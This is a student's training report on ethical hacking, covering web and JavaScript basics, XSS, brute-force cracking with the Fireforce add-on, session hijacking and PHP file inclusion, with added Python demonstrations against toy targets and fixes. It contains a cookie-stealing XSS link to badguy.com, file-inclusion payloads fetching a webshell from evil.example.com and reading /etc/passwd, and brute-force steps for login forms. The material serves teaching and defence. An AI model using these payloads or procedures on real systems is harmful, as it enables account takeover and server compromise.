SUMMER TRAINING
REPORT
SUBMITTED BY:DEVPRIYO RAY
CSE-A, 3RD YEAR (VTH SEMESTER)
REG. NO-1031330059
INTRODUCTION
ANONYMOUS
As for the literal operation of Anonymous, becoming
part of it is as simple as going onto its Internet Relay
Chat (IRC) forums and typing away.
The real-life people involved in Anonymous could be
behind their laptops anywhere, from an Internet café
in Malaysia to a Michigan suburb.
Anonymous appears to have no spokesperson or
leader.
One could participate for a minute or a day in a chat
room, and then never go back again.
Anonymous is seen by its supporters as the future form
of Internet-based social activism; they laud these
"hacktivists" for their actions.
WHY DO PEOPLE HACK?
To make security stronger (ethical hacking)
Just for fun
To show off
To break into other systems secretly
To spread a message to many people
To steal important information
To disrupt an enemy's computer networks during a war
WHAT IS ETHICAL HACKING?
Also called attack and penetration testing, white-hat
hacking, or red teaming:
It is legal
Permission is obtained from the target
It is part of an overall security program
It identifies vulnerabilities visible from the
Internet
Ethical hackers possess the same skills, mindset and
tools as an attacker, but the attacks are done in a
non-destructive manner and conform to accepted
professional standards of conduct.
Hacking
The process of breaking into systems for:
Personal or commercial gain
Malicious intent, causing severe damage to
information and assets
TYPES OF HACKERS
White Hat Hackers:
A White Hat is a hacker who specializes in penetration
testing and in other testing methodologies to ensure the
security of an organization's information systems, with
the owner's authorization.
Black Hat Hackers:
A Black Hat is a hacker who breaks into systems without
authorization, for personal gain or with malicious intent.
The name comes from western movies, in which the villain
stereotypically wears a black hat in contrast to the
hero's white hat.
Grey Hat Hackers:
A Grey Hat, in the hacking community, refers to a
skilled hacker whose activities fall somewhere
between those of white and black hat hackers, for example
one who breaks into a system without authorization but
reports what was found instead of exploiting it.
Why Can't We Defend Against Hackers?
There are many unknown security holes in any
system.
An attacker needs to know only one loophole in the
system.
The administrator needs to know all the loopholes to
defend the system.
Why Do We Need Ethical Hacking?
TYPES OF ATTACKS
Various kinds of attacks on a computer system include:
Denial of service attack
Brute force attack
Cross site scripting (XSS)
File inclusion (or file upload), and many more.
WEB BASICS AND SECURITY
WEB APPLICATIONS:
Big trend: software as a (Web-based) service
Online banking, shopping, government, bill
payment, tax prep, customer relationship
management, etc.
Cloud computing
Applications hosted on Web servers
Written in a mixture of PHP, Java, Perl, Python, C,
ASP
Security is rarely the main concern:
Poorly written scripts with inadequate input
validation
Sensitive data stored in world-readable files
Recent push from Visa and MasterCard to improve the
security of cardholder data management (the PCI DSS
standard)
TYPICAL WEB APPLICATION DESIGN:
A typical web application:
Runs on a Web server or application server
Takes input from Web users (via Web server)
Interacts with back-end databases and third parties
Prepares and outputs results for users (via Web
server)
Dynamically generated HTML pages
Contain content from many different
sources, often including regular users
Blogs, social networks, photo-sharing
websites
BROWSER AND NETWORK:
A browser interacts with the network on the user's
behalf. It sends HTTP requests to web servers according
to what the user asks for: a GET request to fetch a page
or resource, a POST request to submit form data. The
server's HTTP response (HTML, scripts, images) is then
rendered and displayed by the browser.
BASIC EXECUTION MODEL OF A BROWSER:
Each browser window or frame:
Loads content
Renders
Processes HTML and scripts to display
the page
May involve images, subframes, etc.
Responds to events
Events
User actions: OnClick, OnMouseover
Rendering: OnLoad
Timing: setTimeout(), clearTimeout()
HTML AND SCRIPTS:
EXAMPLE
<html>
<body>
<p>The script on this page adds two numbers.</p>
<script>
// prompt() returns strings, so parseInt() is needed before adding
var num1 = prompt("Enter first number");
var num2 = prompt("Enter second number");
var sum = parseInt(num1, 10) + parseInt(num2, 10);
alert("Sum = " + sum);
</script>
</body>
</html>
EVENT DRIVEN SCRIPT EXECUTION:
EXAMPLE
<script type="text/javascript">
// The handler receives the mouse event; in the standard DOM event model
// event.button is 0 for the left button and 2 for the right button
// (the original test event.button==1 matched the left button only in
// old Internet Explorer).
function whichButton(event) {
if (event.button == 0) {
alert("You clicked the left mouse button!");
} else if (event.button == 2) {
alert("You clicked the right mouse button!");
}
}
</script>
<body onmousedown="whichButton(event)">
</body>
JAVASCRIPT:
Language executed by the browser
Scripts are embedded in Web pages
Can run before the HTML is loaded, before the
page is viewed, while it is being viewed or
when leaving the page
Used to implement active web pages
AJAX, huge number of Web-based
applications
If an attacker can inject script into a page, the
attacker gets to execute code on the user's machine,
inside the browser
Often used to exploit other vulnerabilities
"The world's most misunderstood programming
language"
JAVASCRIPT IN WEBPAGES:
Embedded in an HTML page as a <script> element
JavaScript written directly inside the <script>
element:
<script> alert("Hello World!") </script>
Linked file as the src attribute of the <script>
element:
<script type="text/javascript" src="functions.js"></script>
Event handler attribute:
<a href="http://www.yahoo.com"
onmouseover="alert('hi');">
Pseudo-URL referenced by a link:
<a href="javascript:alert('You clicked');">Click
me</a>
JAVASCRIPT SECURITY MODEL:
Script runs in a sandbox
No direct file access, restricted network
access
Same-origin policy
A script can only read properties of documents and
windows that have the same origin: the same protocol
(scheme), host name and port. The path is not part
of the origin.
If the same origin hosts unrelated sites (for
example under different paths of one host name),
scripts from one site can access document
properties of the other
Historically (Netscape and old Mozilla builds), the user
could grant extra privileges to signed scripts:
UniversalBrowserRead/Write, UniversalFileRead,
UniversalSendMail. Modern browsers no longer support
this mechanism.
REMOTE SCRIPTING:
Goal: exchange data between a client-side app in a
browser and a server-side app (without reloading the page)
Methods
Java applet, ActiveX control or Flash
Can make HTTP requests and interact with client-side
JavaScript code, but requires LiveConnect (not available
on all browsers); these plugin-based methods are now
obsolete
XML-RPC
Open, standards-based technology that requires
XML-RPC libraries on your server and in client-side code
Simple HTTP via a hidden IFRAME
An IFRAME that loads a script on your web server (or a
database of static HTML files) is by far the easiest
remote scripting option; today the same exchange is
normally done with XMLHttpRequest (AJAX)
REMOTE SCRIPTING EXAMPLE:
client.html: pass arguments to server.html
<script type="text/javascript">
// called by the page that gets loaded into the hidden iframe
function handleResponse() {
alert('this function is called from server.html');
}
</script>
<iframe id="RSIFrame" name="RSIFrame"
style="width:0px; height:0px; border:0px"
src="blank.html">
</iframe>
<a href="server.html" target="RSIFrame">make RPC call</a>
server.html: could be a PHP app, anything; its response
calls back into the parent page
<script type="text/javascript">
// works only because server.html is loaded from the same
// origin as client.html (same-origin policy)
window.parent.handleResponse();
</script>
CROSS SITE SCRIPTING(XSS)
WHAT IS XSS ?
An XSS vulnerability is present when an attacker can
inject scripting code into pages generated by a web
application.
Methods for injecting malicious code:
Reflected XSS (type 1)
the attack script is reflected back to the user as
part of a page from the victim site
Stored XSS (type 2)
the attacker stores the malicious code in a
resource managed by the web application, such
as a database
Others, such as DOM-based XSS (type 0), where
client-side script itself writes untrusted data (for
example from the URL fragment) into the page
XSS EXAMPLE:
Search field on victim.com:
http://victim.com/search.php?term=apple
Server-side implementation of search.php:
<HTML> <TITLE> Search Results </TITLE>
<BODY>
Results for
<?php echo $_GET['term']; ?> (echoes the search term into the response without encoding)
...
</BODY> </HTML>
Now consider the link (shown unencoded for readability;
in a real attack the script part would be URL-encoded):
http://victim.com/search.php?term=<script>window.open("http://badguy.com/?cookie="+document.cookie)</script>
What if the user clicks on this link?
1. The browser requests victim.com/search.php with the
attacker's term.
2. victim.com returns
<HTML> Results for <script>window.open("http://badguy.com/?cookie="+document.cookie)</script> ...
3. The browser executes the script in the context of
victim.com, which sends the user's victim.com cookie
to badguy.com.
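To see the reflected XSS above without running a PHP server, here is an added Python model (my code, not the report's) of search.php: one function echoes the term exactly as the vulnerable page does, the other HTML-encodes it on output, which is the fix (htmlspecialchars() in PHP). The attacker link is constructed here, URL-encoded as a browser would send it; victim.com and badguy.com are the placeholder hosts from the text.

```python
import html
from urllib.parse import parse_qs, urlsplit


def search_page_vulnerable(term: str) -> str:
    """Mirror of search.php in the text: the term is echoed into the HTML unencoded."""
    return ("<HTML><TITLE>Search Results</TITLE><BODY>"
            f"Results for {term}"
            "</BODY></HTML>")


def search_page_fixed(term: str) -> str:
    """Same page with the term HTML-encoded on output (htmlspecialchars() in PHP):
    '<' becomes '&lt;', so the browser shows the text instead of running it."""
    return ("<HTML><TITLE>Search Results</TITLE><BODY>"
            f"Results for {html.escape(term, quote=True)}"
            "</BODY></HTML>")


def term_from_url(url: str) -> str:
    """Extract the 'term' query parameter the way $_GET['term'] would see it."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("term", [""])[0]


# Constructed attacker link modelled on the one in the text, with the payload
# URL-encoded the way a browser sends it. PAYLOAD is the decoded form.
PAYLOAD = '<script>window.open("http://badguy.com/?cookie="+document.cookie)</script>'
ATTACK_URL = ("http://victim.com/search.php?term="
              "%3Cscript%3Ewindow.open(%22http://badguy.com/?cookie=%22%2Bdocument.cookie)%3C/script%3E")


def contains_live_script(page: str) -> bool:
    """Crude response check: is there an unencoded <script tag in the HTML?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    term = term_from_url(ATTACK_URL)
    print("vulnerable:", search_page_vulnerable(term))
    print("fixed:     ", search_page_fixed(term))
```

For a normal term such as "apple" both versions produce identical output; only the encoding of the attacker's characters differs, which is why output encoding is the cheap, general fix.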
[Figures: output of the example; reflected XSS flow; stored XSS flow.]
CRACKING
Cracking is the process of recovering the passwords of
certain documents, files, accounts, etc. by illegal means.
In a penetration test, however, cracking is not illegal:
it is done with the consent of the responsible
authorities.
Various methods are used to crack passwords, such as
brute force attacks, dictionary attacks, social
engineering, etc.
EXAMPLE OF A BRUTE FORCE ATTACK USING
FIREFORCE:
Fireforce is a Mozilla Firefox add-on for brute-forcing
web login forms. After installing the add-on, the
following procedure is followed:
Launching the attack:
We want the password for the user admin.
1) Fill the username field with admin.
2) Right-click in the password field and select
Fireforce > Generate Password > and specify the
type of password (the character set to use).
3) Enter the minimum length.
4) Enter the maximum length.
5) Enter the text that identifies a failed
authentication (the string the page returns for a wrong
password; Fireforce uses its absence to detect success).
6) Enter the number of requests per second.
Click on Save and Fireforce generates the candidate
passwords and submits them one after another.
The feasibility of such an online attack depends on the
size of the keyspace (character set and length range) and
on how many requests per second the target accepts, not
only on the CPU of the attacking machine. Large sites such
as Facebook or Gmail rate-limit login attempts and lock
accounts after repeated failures, so exhaustively trying
every password against their login forms is not practical.
A dictionary attack reduces the number of guesses by
trying likely passwords first (common words, previously
leaked passwords) and therefore needs far less computing
power than an exhaustive search, but it only succeeds if
the password is in the list and the target does not lock
the account first.
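The following added Python example (my code, not Fireforce and not from the report) reproduces the Fireforce workflow against a toy login endpoint constructed in the block: generate candidates over a character set between a minimum and a maximum length, submit them, and detect success by the absence of the failure text (steps 2 to 5 above). keyspace() and seconds_needed() show why the length range and the request rate of step 6 decide feasibility, Login(lockout_after=5) shows what an account lockout does to the same attack, and dictionary_attack() runs a constructed word list through the same loop. The user name, secret password and reply strings are all made up.

```python
import itertools
import string

# Constructed target: a toy login form. _SECRET is what the attacker tries to
# recover; nothing in the attack code reads it.
_SECRET = "ab1"
FAILURE_TEXT = "Login failed"      # the text asked for in step 5
CHARSET = string.ascii_lowercase + string.digits   # the "type of password" of step 2


class Login:
    """Toy login endpoint. lockout_after=None models an unprotected form; an
    integer locks the account after that many consecutive failures."""

    def __init__(self, lockout_after=None):
        self.lockout_after = lockout_after
        self.failures = 0
        self.locked = False
        self.requests = 0

    def attempt(self, username: str, password: str) -> str:
        self.requests += 1
        if self.locked:
            return "Account locked"
        if username == "admin" and password == _SECRET:
            self.failures = 0
            return "Welcome, admin"
        self.failures += 1
        if self.lockout_after is not None and self.failures >= self.lockout_after:
            self.locked = True
        return FAILURE_TEXT


def candidates(charset: str, min_len: int, max_len: int):
    """Yield every string over charset with min_len <= len <= max_len, shortest first."""
    for n in range(min_len, max_len + 1):
        for chars in itertools.product(charset, repeat=n):
            yield "".join(chars)


def keyspace(charset: str, min_len: int, max_len: int) -> int:
    """Number of candidates candidates() produces, i.e. the worst-case request count."""
    return sum(len(charset) ** n for n in range(min_len, max_len + 1))


def seconds_needed(guesses: int, requests_per_second: float) -> float:
    """Worst-case duration at the rate entered in step 6."""
    return guesses / requests_per_second


def run_attack(target: Login, guesses, failure_text: str = FAILURE_TEXT):
    """Submit guesses until a reply lacks the failure text (success) or the
    account locks. Returns (password or None, number of requests sent)."""
    for guess in guesses:
        reply = target.attempt("admin", guess)
        if reply == "Account locked":
            return None, target.requests
        if failure_text not in reply:
            return guess, target.requests
    return None, target.requests


def brute_force(target: Login, charset: str, min_len: int, max_len: int):
    """Exhaustive search, exactly what Fireforce's generated-password mode does."""
    return run_attack(target, candidates(charset, min_len, max_len))


def dictionary_attack(target: Login, wordlist):
    """Same loop over a word list instead of every combination."""
    return run_attack(target, wordlist)


if __name__ == "__main__":
    total = keyspace(CHARSET, 1, 3)
    print("keyspace:", total, "worst case at 10 req/s:", seconds_needed(total, 10), "s")
    print("open form:   ", brute_force(Login(), CHARSET, 1, 3))
    print("with lockout:", brute_force(Login(lockout_after=5), CHARSET, 1, 3))
    print("word list:   ", dictionary_attack(Login(), ["password", "123456", "ab1"]))
```

Against the open form the three-character secret falls after 1396 requests; against the form with a five-failure lockout the same attack is over after six requests with nothing found, which is the control that matters more than the attacker's CPU.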
SESSION HIJACKING
Session hijacking, sometimes also known as cookie
hijacking, is the exploitation of a valid computer
session (sometimes also called a session key) to gain
unauthorized access to information or services in a
computer system. In particular, it is used to refer to
the theft of the "magic cookie" used to authenticate a
user to a remote server. It has particular relevance to
web developers, as the HTTP cookies used to maintain a
session on many web sites can be easily stolen by an
attacker using an intermediary computer or with
access to the saved cookies on the victim's computer.
An older, network-level method uses source-routed IP
packets. This allows an attacker at point B on the
network to participate in a TCP conversation between A
and C by forcing the IP packets to pass through B's
machine. Most networks now drop source-routed packets.
If source routing is turned off, the attacker can use
"blind" hijacking, whereby he guesses the TCP sequence
numbers and the responses of the two machines. Thus the
attacker can send a command, but can never see the
response. A typical command would be one that sets a
password or otherwise allows access from somewhere else
on the net.
METHODS OF SESSION HIJACKING:
Session fixation, where the attacker sets a user's
session id to one known to him, for example by
sending the user an email with a link that
contains a particular session id. The attacker then
only has to wait until the user logs in with that id.
The defence is to issue a fresh session id at login.
Session sidejacking, where the attacker
uses packet sniffing to read network traffic
between two parties to steal the session cookie.
Many web sites use SSL/TLS encryption
for login pages to prevent attackers from seeing
the password, but do not use encryption for the
rest of the site once the user is authenticated. This
allows attackers that can read the network traffic to
intercept all the data that is submitted to
the server or web pages viewed by the client.
Since this data includes the session cookie, it
allows the attacker to impersonate the victim, even if
the password itself is not compromised.
Unsecured Wi-Fi hotspots are particularly
vulnerable, as anyone sharing the network will
generally be able to read most of the web traffic
between other nodes and the access point. Sending the
cookie only over HTTPS (the Secure cookie flag) prevents
this.
Cross-site scripting, where the attacker tricks the
user's browser into running code which is
treated as trustworthy because it appears to
belong to the server, allowing the attacker to
obtain a copy of the cookie or perform other
operations. Marking the cookie HttpOnly keeps script
from reading it.
Malware and unwanted programs can
use browser hijacking to steal a browser's cookie
files without the user's knowledge, and then
perform actions (such as installing apps) on the
user's behalf. An attacker with
physical access can simply attempt to steal
the session key by, for example, obtaining the
file or memory contents of the appropriate part
of either the user's computer or the server.
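An added Python model (my code, not from the report) of the session fixation attack and its defence: a toy server-side session store that either keeps the pre-login session id or regenerates it at login, run through the attack once in each mode. set_cookie_header() shows the cookie flags that address the other two methods above, Secure against sidejacking and HttpOnly against theft by injected script. The user, password and the attacker's planted id are constructed, and the plain-string password store stands in for a real password hash.

```python
import hmac
import secrets

# Constructed user database with one user. A real server stores a salted
# password hash (bcrypt/argon2); a plain string is enough for this toy.
_USERS = {"alice": "correct horse"}


def check_password(username: str, password: str) -> bool:
    stored = _USERS.get(username)
    return stored is not None and hmac.compare_digest(stored.encode(), password.encode())


class SessionStore:
    """Server-side session table: session id -> {"user": name or None}."""

    def __init__(self, regenerate_on_login: bool):
        self.regenerate_on_login = regenerate_on_login
        self.sessions = {}

    def new_session(self, requested_id=None) -> str:
        """Start an anonymous session. Honouring a requested_id taken from the
        URL or cookie is what makes fixation possible; a safe server ignores it
        and always picks its own random id."""
        sid = requested_id or secrets.token_urlsafe(32)
        self.sessions[sid] = {"user": None}
        return sid

    def login(self, sid: str, username: str, password: str):
        """Authenticate within session sid. Returns the id the client must use afterwards."""
        if sid not in self.sessions or not check_password(username, password):
            return None
        if self.regenerate_on_login:
            # Defence: drop the pre-login id so anything an attacker planted is useless.
            del self.sessions[sid]
            sid = secrets.token_urlsafe(32)
            self.sessions[sid] = {"user": None}
        self.sessions[sid]["user"] = username
        return sid

    def whoami(self, sid: str):
        entry = self.sessions.get(sid)
        return entry["user"] if entry else None


def fixation_attack(store: SessionStore):
    """Attacker plants a known id, the victim logs in with it, the attacker then
    presents it. Returns (user the planted id maps to, whether the victim got a new id)."""
    planted = "ATTACKER_KNOWN_ID"            # constructed; e.g. carried in an emailed link
    store.new_session(planted)                # victim's browser starts a session with it
    victim_sid = store.login(planted, "alice", "correct horse")
    return store.whoami(planted), victim_sid != planted


def set_cookie_header(sid: str) -> str:
    """Cookie flags: Secure blocks sidejacking over plain HTTP, HttpOnly blocks
    document.cookie reads by injected script."""
    return f"Set-Cookie: SESSIONID={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    print("vulnerable store:", fixation_attack(SessionStore(regenerate_on_login=False)))
    print("hardened store:  ", fixation_attack(SessionStore(regenerate_on_login=True)))
    print(set_cookie_header(secrets.token_urlsafe(32)))
```

With regenerate_on_login=False the planted id now maps to alice, so the attacker is logged in as her; with it set to True the planted id is gone from the table and the victim carries a fresh random id the attacker never saw.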
FILE INCLUSION
A file inclusion vulnerability is a type
of vulnerability most often found on websites.
It allows an attacker to include a file, usually
through a script on the web server. The
vulnerability occurs due to the use of user-supplied
input without proper validation. This
can lead to something as minimal as outputting
the contents of a file, or to more serious events
such as:
Code execution on the web server
Code execution on the client side, such
as JavaScript, which can lead to other attacks
such as cross site scripting (XSS)
Denial of service (DoS)
Data theft or manipulation
TYPES OF INCLUSION:
1) REMOTE FILE INCLUSION (the included file is fetched
from another host)
2) LOCAL FILE INCLUSION (the included file already
exists on the server)
EXAMPLE:
Consider this PHP script which includes a file
specified by request:
<?php
if ( isset( $_GET['COLOR'] ) ) {
include( $_GET['COLOR'] . '.php' );
}
?>
<form method="get">
<select name="COLOR">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit">
</form>
The developer intended only blue.php and red.php
to be used as options. But it is possible to include
other files, because anyone can insert arbitrary values
for the COLOR parameter:
/vulnerable.php?COLOR=http://evil.example.com/webshell.txt? - includes a
remotely hosted file containing malicious code (the
trailing ? turns the appended .php into a query string;
this only works if allow_url_include is enabled in PHP).
/vulnerable.php?COLOR=C:\\ftp\\upload\\exploit - executes code from an
already uploaded file called exploit.php (local file
inclusion).
/vulnerable.php?COLOR=C:\\notes.txt%00 - uses the NUL character to cut off
the appended .php suffix, allowing access to files other
than .php. (Enabling magic_quotes_gpc limited this attack
by escaping special characters, thus disabling the NUL
terminator; PHP 5.3.4 and later reject NUL bytes in file
paths, and magic_quotes_gpc was removed in PHP 5.4.)
/vulnerable.php?COLOR=/etc/passwd%00 - allows an attacker to read the
contents of the passwd file on a UNIX system (directory
traversal).
The fix is to never build the file name from raw input:
check the value against an allow list of the intended
names (red, blue) and reject anything else.
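The following added Python example (my code, not part of the report) resolves the COLOR parameter the way the vulnerable PHP include does on an old PHP build with allow_url_include on, runs the four payloads from the text through it, and contrasts that with an allow-list resolver that never turns the parameter into a path. INCLUDE_ROOT and the payload strings are constructed; the "\x00" bytes stand for the %00 in the URLs after decoding.

```python
import posixpath

# Constructed: where the intended include files live, and the only names allowed.
INCLUDE_ROOT = "/var/www/app/colors"
ALLOWED_COLORS = {"red", "blue"}


def resolve_vulnerable(color: str) -> str:
    """Model of include($_GET['COLOR'] . '.php') on an old PHP build with
    allow_url_include on: a NUL byte truncates the name (pre-5.3.4 behaviour),
    URLs are fetched from the remote host, absolute paths are used as given.
    Returns a tag plus the resolved target so a caller can see what would load."""
    name = color + ".php"
    if "\x00" in name:                      # %00 in the URL: cuts off the appended .php
        name = name.split("\x00", 1)[0]
    if name.lower().startswith(("http://", "https://", "ftp://")):
        return "REMOTE:" + name             # remote file inclusion
    if posixpath.isabs(name) or name[1:3] == ":\\":
        return "LOCAL:" + name              # absolute UNIX or Windows path: local file inclusion
    return "LOCAL:" + posixpath.join(INCLUDE_ROOT, name)


def resolve_safe(color: str):
    """Allow-list resolver: the parameter selects a name, it never becomes a path.
    Anything not on the list is rejected (None), so no concatenation trick matters."""
    if color not in ALLOWED_COLORS:
        return None
    return posixpath.join(INCLUDE_ROOT, color + ".php")


# The four payloads from the text, with %00 already URL-decoded to a NUL byte.
PAYLOADS = [
    "http://evil.example.com/webshell.txt?",
    "C:\\ftp\\upload\\exploit",
    "C:\\notes.txt\x00",
    "/etc/passwd\x00",
]


def compare() -> list:
    """(payload, what the vulnerable include would load, what the safe one loads)."""
    return [(p, resolve_vulnerable(p), resolve_safe(p)) for p in PAYLOADS]


if __name__ == "__main__":
    for payload, bad, good in compare():
        print(f"{payload!r:45} vulnerable -> {bad:50} safe -> {good}")
    print("red  ->", resolve_vulnerable("red"), "/", resolve_safe("red"))
```

Note how the first payload's trailing ? survives into the remote URL and demotes the appended .php to a query string, and how the NUL byte discards it entirely in the last two; the allow-list version returns None for all four and only ever joins red.php or blue.php to INCLUDE_ROOT.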